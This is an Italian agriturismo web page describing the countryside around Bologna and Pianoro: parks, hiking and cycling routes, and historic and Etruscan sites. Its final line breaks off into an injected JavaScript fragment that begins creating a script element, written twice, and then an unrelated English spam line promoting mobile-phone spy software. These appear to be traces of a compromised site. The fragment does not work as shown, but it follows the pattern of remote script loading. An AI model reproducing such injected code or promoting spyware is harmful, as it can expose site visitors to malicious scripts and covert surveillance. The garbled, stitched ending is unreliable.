Bologna e dintorni


I confini della tenuta distano poche centinaia di metri dal Parco Regionale dei Gessi Bolognesi e Calanchi dell’Abbadessa, il più grande parco carsico dell’Emilia Romagna, che si estende tra i comuni di Bologna, Pianoro, San Lazzaro di Savena e Ozzano dell’Emilia.

Il territorio circostante l’Agriturismo offre un’infinità di possibili passeggiate, escursioni e trekking a piedi e a cavallo, partendo dal bosco della tenuta fino ad esplorare l’Appennino Tosco Emiliano.

Nel comune confinante di Sasso Marconi in località Badolo ci sono pareti per rocciatori e free-climbers famose a livello Nazionale.

All’interno del Comune di Pianoro troverete impianti per quasi tutti gli sport: calcio, basket, palestre, piscine, cricket, baseball, tennis, equitazione.

I colli bolognesi sono famosi anche per il ciclismo in tutte le sue forme, dalla strada asfaltata al mountain-bike e al cicloturismo, con una miriade di strade, mulattiere, capezzagne e sentieri ciclabili di tutti i tipi dai più semplici ai più impegnativi.
Nelle vicinanze passa la storica strada della Futa, percorsa fin dall’anno mille dagli Europei che andavano a Roma in pellegrinaggio o per il Grand Tour sette-ottocentesco. E’ un alternativo percorso asfaltato, che porta a Firenze fra scenari imperdibili.

Passa a poche centinaia di metri dalla tenuta anche la famosa “Strada degli Dei” o Flaminia Militare, strada militare romana che collegava Bologna a Fiesole, ora percorso ideale per trekking e ciclisti percorribile in 3 o 4 giorni facendo varie tappe.

Inoltre con un comodissimo treno dalla stazione di Rastignano, si può raggiungere Firenze in soli 40 minuti.

COSA VISITARE NEI DINTORNI DELL’AGRITURISMO

Il territorio circostante riserva al turista attento luoghi di grande bellezza:

L’eremo di Ronzano, antico convento di frati la cui storia risale fino al 1140, da cui si gode una vista mozzafiato su Bologna e nelle giornate limpide si possono ammirare le Alpi con più di 100 Km di visibilità.

Il contrafforte pliocenico, strabiliante formazione rocciosa di arenaria che va come una muraglia trasversale alle valli appenniniche,

Il Monte delle Formiche, antico santuario, famoso per il fenomeno migratorio annuale delle formiche alate durante il mese di settembre.

Il Parco di Monte Sole, che oltre a presentare una natura incontaminata, porta il ricordo della terribile strage nazifascista di Marzabotto del 1944,

Marzabotto, con villa Aria e il suo museo etrusco di Misa, unica città etrusca che non abbia subito poi costruzioni romane o medievali, e pertanto rimasta intatta nella sua forma ortogonale.

Monte Bibele, in comune di Monterenzio, antico abitato etrusco-celtico, peculiare esempio di convivenza pacifica tra stirpi diverse, prima della distruzione ad opera dei romani all’inizio del II° secolo a.C.

Sasso Marconi con la casa e il museo di Guglielmo Marconi.var d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’); The most popular 2017 spy software applications for the mobile phones.